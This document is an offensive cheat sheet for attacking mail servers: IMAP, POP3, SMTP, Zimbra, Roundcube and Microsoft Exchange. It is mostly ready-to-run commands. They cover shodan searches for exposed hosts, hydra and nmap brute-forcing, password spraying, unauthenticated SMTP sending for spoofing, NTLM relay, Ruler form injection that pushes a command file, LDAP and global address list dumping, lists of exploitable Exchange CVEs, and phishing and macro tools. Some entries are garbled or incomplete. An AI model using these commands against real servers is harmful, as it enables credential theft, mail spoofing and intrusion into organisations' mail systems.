

Mail Server Attacks Cheat Sheet

A cheat sheet that contains common enumeration and attack methods for Mail Server.



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IMAP

Information Gathering

```
nmap [-sS] [-sC] -Pn -p 143,993 -sV --script=banner [IP]
```

```
nc -nv <IP> 993 [IP]
```

```
shodan search "port:143"
```

Attacks

NTLM Auth

```
telnet example.com 143
```

```
a1 AUTHENTICATE NTLM
```

```
nmap --script=imap-ntlm-info [IP]
```

Bruteforce

```
hydra -l USERNAME -P passwords.txt -f [IP] imap -V
```

```
hydra -S -v -l USERNAME -P passwords.txt -s 993 -f [IP] imap -V
```

```
nmap -sV --script imap-brute -p [PORT] [IP]
```

POP3

Information Gathering

```
nmap [-sS] [-sC] -Pn -p 110,995 -sV --script=banner [IP]
```

```
nc -nv <IP> 110 [IP]
```

```
shodan search "port:995"
```

Attacks

NTLM Auth

```
nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port [PORT] [IP]
```

```
a1 AUTHENTICATE NTLM
```

Bruteforce

```
nmap -p110 --script pop3-brute <target>
```

```
hydra -l muts -P pass.txt [IP] pop3
```

SMTP

Information Gathering

```
nmap [-sS] [-sC] -Pn -p 25,465,587 -sV --script=banner or --script smtp-commands [IP]
```

```
nc -nv <IP> 25 [IP]
```

```
nc -nv <IP> 465 [IP]
```

```
nc -nv <IP> 587 [IP]
```

```
shodan search "port:25"
```

```
shodan search "port:465"
```

```
shodan search "port:587"
```

Attacks

NTLM Auth

```
telnet example.com 587
HELO
AUTH NTLM 334
```

```
a1 AUTHENTICATE NTLM
```

Bruteforce

```
nmap -p[25,465,587] --script smtp-brute <target>
```

```
hydra -l muts -P pass.txt [IP] smtp
```

Spoofing

```
emkei.cz
```

Non Auth

```
telnet [IP] [25 or 465 or 587]
MAIL FROM: sender@address.ext
RCPT TO: recipient@address.ext
SUBJECT: Test message
.
```

Zimbra

Information Gathering

```
shodan search "8.8.6_GA_1906"
```

```
shodan search "zimbra"
```

Attacks

Misconfiguration

```
modules/auxiliary/gather/memcached_extractor
```

Anti-Malware

```
evilmacro  
macropack  
...
```

ActiveSync(LDAP)

```
LDAPPER.py -D EVIL -U 'Administrator' -P 'password' -S DC02.EVIL.DEV  
' (msExchDeviceID=123456)
```

ActiveSync(SMB Share)

```
peas -u 'EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc '\\DC01\'
```

Phishing

```
gophish
```

Known Vuln

```
CVE-2022-37042  
CVE-2022-37041  
CVE-2022-37044
```

Spray

```
POST
```

Roundcube

Information Gathering

```
shodan search "http.title:'Roundcube Webmail :: Welcome to Roundcube Webmail'"
```

```
shodan search "http.favicon.hash:976235259"
```

Attacks

Anti-Malware

```
evilmacro  
macropack  
...
```

ActiveSync(LDAP)

```
LDAPPER.py -D EVIL -U 'Administrator' -P 'password' -S DC02.EVIL.DEV  
' (msExchDeviceID=123456)
```

ActiveSync(SMB Share)

```
peas -u 'EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc '\\DC01\'
```

Phishing

```
gophish
```

Known Vuln

```
2021-44026
```

Spray

```
POST
```

Microsoft Exchange

Information Gathering

```
shodan search "'X-AspNet-Version http.title:'Outlook' -'x-owa-version'"  
shodan search "http.favicon.hash:44274939"
```

```
shodan search "http.title:outlook exchange"
```

Attacks

AutotDiscover

```
autodiscover/autodiscover.xml
```

Known Vuln

ProxyLogon(2021-26855)

ProxyShell(2021-34473)

HAFNIUM(2021-26858)

Spray

Invoke-PasswordSprayOWA

Invoke-PasswordSprayEWS

NTLM Auth

```
nmap --script http-ntlm-info
```

NTLMRelay

reponder

```
./exchangeRelayx.py -t https://mail.xyzczz.com
```

GAL

Get-GlobalAddressList -ExchHostname mail.domain.com -UserName

domain\username -Password password -OutFile global-address-list.txt

Exchange Admin Group Deligation

Bloodhound

net

Rule

<https://t.me/learningnets>

GUI

Ruler

Forms

```
./ruler --email user@evil.dev form add --suffix superduper --input command.txt --send
```

Anti-Malware

```
evilmacro
macropack
...
```

ActiveSync(LDAP)

```
LDAPPER.py -D EVIL -U 'Administrator' -P 'password' -S DC02.EVIL.DEV
' (msExchDeviceID=123456)
```

ActiveSync(SMB Share)

```
peas -u 'EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc '\\DC01\'
```

ActiveSync(WSS)

```
peas -U 'EVIL.DEC\user' -p 'password' exch01.evil.dev -smb-user='EVIL\sharepoint-setup'
• -smb-pass='password' •-list-unc 'http://SHP01/share'
```

RPC

```
nmap mail.evil.dev -p 6001 -sV -sC
```

```
rpcmap.py -debug -auth-transport'EVIL/user:password'
'ncacn http://6001,RpcProxy=mail.evil.dev:443]'
```

```
rpcmap.py -debug -auth-transport 'EVIL/user:password' -auth-rpc 'EVIL/mia:password' -auth-lev
```

LDAP

```
LDAPPER.py -D EVIL - U 'Administrator' -P 'password' -S DC01. EVIL.DEV  
(mail=user@evil.dev) mail objectGUID legacyExchangeDN distinguishedName
```

```
exchanger.py EVIL/user: 'password'@mail.evil.dev nspi  
dump -tables -name Hackers -lookup-type EXTENDED
```

Phishing

gophish